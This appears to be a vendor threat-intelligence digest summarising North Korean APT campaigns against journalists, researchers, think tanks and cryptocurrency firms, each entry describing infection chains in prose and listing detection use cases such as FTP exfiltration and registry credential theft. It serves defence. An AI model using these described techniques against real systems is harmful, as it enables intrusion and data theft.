APT37 Targeting Journalists and Researchers

May 03, 2022

APT37 Targeting Journalists and Researchers

Industry: Media | Level: Tactical | Source: Stairwell

NK News, an American news source reporting activities in North Korea, has identified of suspicious spear-phishing emails as a threat campaign by the North Korean threat group, APT37/Richochet Chollima. The campaign appears to be targeting journalists and researchers reporting sensitive issues within the country. The news organization engaged Stairwell’s cybersecurity team, in March 2022, discovering a new malware named, GOLDBACKDOOR. The threat group employs a multi-stage infection process to evade defenses. A compressed file is attached to the suspicious email containing Windows LNK, shortcut files. When the shortcut files are executed, PowerShell scripts are launched presenting a decoy document to distract the victim whilst downloading and executing malicious shellcode. The downloaded payload, Fantasy, then conducts process injection to deploy GOLDBACKDOOR malware. GOLDBACKDOOR, is identified as a Windows Portable Executable (PE) file with a creation timestamp of February 9th, 2022, 02:38:30 UTC. As analyzed by Stairwell, “Embedded in the analyzed copy of GOLDBACKDOOR is a set of API keys used to authenticate against Azure and retrieve commands for execution. Received commands are prefixed with a single-character value, which denotes the corresponding task requested of the malware. GOLDBACKDOOR provides attackers with basic remote command execution, file downloading/uploading, keylogging, and the ability to remotely uninstall.”

  • Anvilogic Scenario: APT37 – GOLDBACKDOOR – Initial Infection
  • Anvilogic Use Cases:
    • Compressed File Execution
    • Symbolic OR Hard File Link Created
    • Suspicious Executable by CMD.exe
    • Invoke-Expression Command
    • Rare Remote Thread

North Korean APT Groups Target Blockchain and Cryptocurrency Companies

April 19, 2022

North Korean APT Groups Target Blockchain and Cryptocurrency Companies

Industry: Blockchain, Cryptocurrency | Level: Tactical | Source: CISA

The Cybersecurity and Infrastructure Security Agency (CISA) in a joint advisory with the Federal Bureau of Investigation (FBI) and the U.S. Treasury Department (Treasury) warns that state-sponsored advanced persistent threat (APT) groups from North Korea are targeting various organizations in blockchain technology and cryptocurrency. The APT groups include Lazarus Group, APT38, BlueNoroff, and Stardust Chollima. The threat group’s campaigns have involved using social engineering tactics to lure victims on Windows or macOS platforms to download trojanized cryptocurrency applications. The phishing themes used by the APT groups have involved lucrative job opportunities to entice victims. Once the malicious application is executed the cyber actors are able to infiltrate the victim’s host to propagate within their environment to steal credentials, exploit additional security gaps, and/or initiate fraudulent transactions. The United States government has referred to the campaigns with malicious cryptocurrency applications as “TradeTraitor,” as “The term TraderTraitor describes a series of malicious applications written using cross-platform JavaScript code with the Node.js runtime environment using the Electron framework. The malicious applications are derived from a variety of open-source projects and purport to be cryptocurrency trading or price prediction tools. TraderTraitor campaigns feature websites with modern design advertising the alleged features of the applications.”

  • Anvilogic Use Cases:
    • AVL_UC1053 – Web Application File Upload
    • AVL_UC1029 – Wscript/Cscript Execution
    • AVL_UC1040 – Executable File Written to Disk
    • AVL_UC1043 – Command and Control Detection

Lazarus Operation Dream Job

April 19, 2022

Lazarus Operation Dream Job

Industry: Chemical & Information Technology | Level: Tactical | Source: Symantec

Symantec’s tracking of Lazarus, a North Korean advanced persistent threat (APT) has identified activity targeting chemical and information technology sectors in South Korea with Operation Dream Job observed since January 2022. Although the information technology sector was targeted it’s believed the attacks were intended to pivot to the chemical sector. The Operation Dream Job campaign has been active since August 2020, luring victims with themes in fictitious job postings targeting various sectors. A typical attack chain from the campaign has involved the execution of an HTM file to download a malicious DLL file to inject into a process; Symantec has identified process injection into “legitimate system management software INISAFE Web EX Client.” Additional activities observed included credentials obtained from dumping registry keys, executing a BAT file and creating scheduled tasks for persistence.

  • Anvilogic Scenario: Lazarus – Operation Dream Job – Target Chemical Sector
  • Anvilogic Use Cases:
    • Rundll32 Command Line
    • Create/Modify Schtasks
    • Suspicious File written to Disk
    • Windows FTP Exfiltration
    • Credentials in Registry
    • Executable Create Script Process
    • Rare remote thread
    • Control Panel Abuse

Google TAG Identifies Threats from North Korea

March 29, 2022

Google TAG Identifies Threats from North Korea

Industry: Financial Services, Cryptocurrency, Information Technology, Media | Level: Strategic | Source: Google TAG

Research from Google’s Threat Analysis Group (TAG) has been tracking activity from two North Korean threat groups, since February 10th. The associated threat campaigns are named  publicly as “Operation Dream Job” (active since at least June 2020) and “Operation AppleJeus” (active since 2018), as the lures utilize employment themes. The two campaigns target different industries; “Operation Dream Job” has been observed targeting media and technology (hosting providers and software companies), and “Operation AppleJeus” targets financial services, specifically cryptocurrency and fintech organizations. The tactics, techniques and procedures, utilized by both campaigns, leverage the same exploit kit involving a Google Chrome remote code execution (RCE) vulnerability – CVE-2022-0609. The phishing site utilizes an iframe conducting system checks on the victim collecting requirements needed for the RCE exploit to be successful and in addition, a javascript could escape Chrome’s sandbox protection. In order to evade security researchers, the attackers were cautious in their campaign, as they only served the iframe during specific times, to implement a one-time-click policy and ensured exploits would only work if requirements were met.

Targeted BABYSHARK Attack on Think Tank

March 08, 2022

Targeted BABYSHARK Attack on Think Tank

Industry: Think Tank | Level: Tactical | Source: Huntress

A report from Huntress, identified threat activity targeting security think tanks attributed to North Korean threat actors malware strain BABYSHARK. The initial sign of malicious activity was identified from a fraudulent GoogleUpdater scheduled task that runs a malicious vbs file using wscript to download a file hosted on Google Drive. The attack was heavily targeted to this organization as a system check was done by file normal.crp to only execute if the username was “Administrator” or a particular user. The following is noted by Huntress (the mentioned user “Bob” is fictitious to maintain anonymity) “This attack was tailored to focus only on Bob. If (and only if) the username matched Bob, then it would add persistence mechanisms in the Windows registry, stage new obfuscated files, and continue communications with its C2 servers.” Further investigation identified the origin of the attack as a malicious phishing email with a malicious link.

  • Anvilogic Use Cases:
    • Create/Modify Schtasks
    • Suspicious Registry Key Created
    • Wscript/Cscript Execution

Stardust Chollima

November 24, 2021

Stardust Chollima

Industry: N/A | Level: Strategic | Source: DailyBeast

Observed by CrowdStrike, North Korean hackers designated as “Stardust Chollima,” are suspected of going after Chinese security researchers with the objective of stealing their hacking techniques. In June 2021, phishing emails were distributed containing malicious attachments titled “Securitystatuscheck.zip” and “_signed.pdf.” The emails contained references to China’s Ministry of Public Security and the National Information Security Standardization Technical Committee. The motive appears to be for the threat group to obtain new techniques and particularly zero days for offensive campaigns. It is currently unknown if there were any victims.

APT37 and Chinotto Malware

November 24, 2021

APT37 and APT37Malware

Industry: Media & Nonprofit | Level: Tactical | Source: SecureList

North Korean nation-state sponsored group APT37/ScarCruft/Temp.Reaper has been identified by Kaspersky for targeting South Korean journalists defectors, and human rights activists. The group utilized malware, Chinott, distributing through watering holes, spear-phishing emails, and smishing attacks. A news organization had data stolen and evidence found the attackers had access to their environment for several months. The malware versions were observed in PowerShell, Windows, and Android with similar command and control schemes based in HTTP. Additional malware capabilities observed the ability to modify registry keys (specifically enabling trust access for VBA), register a PowerShell command in the Run registry for persistence to execute an HTA file with mshta, and collect files staged a bat folder.

  • Anvilogic Scenario: APT37 & “Chinotto” Malware
  • Anvilogic Use Cases:
    • Query Registry
    • New AutoRun Registry Key
    • MSHTA.exe execution
    • Data Staged to File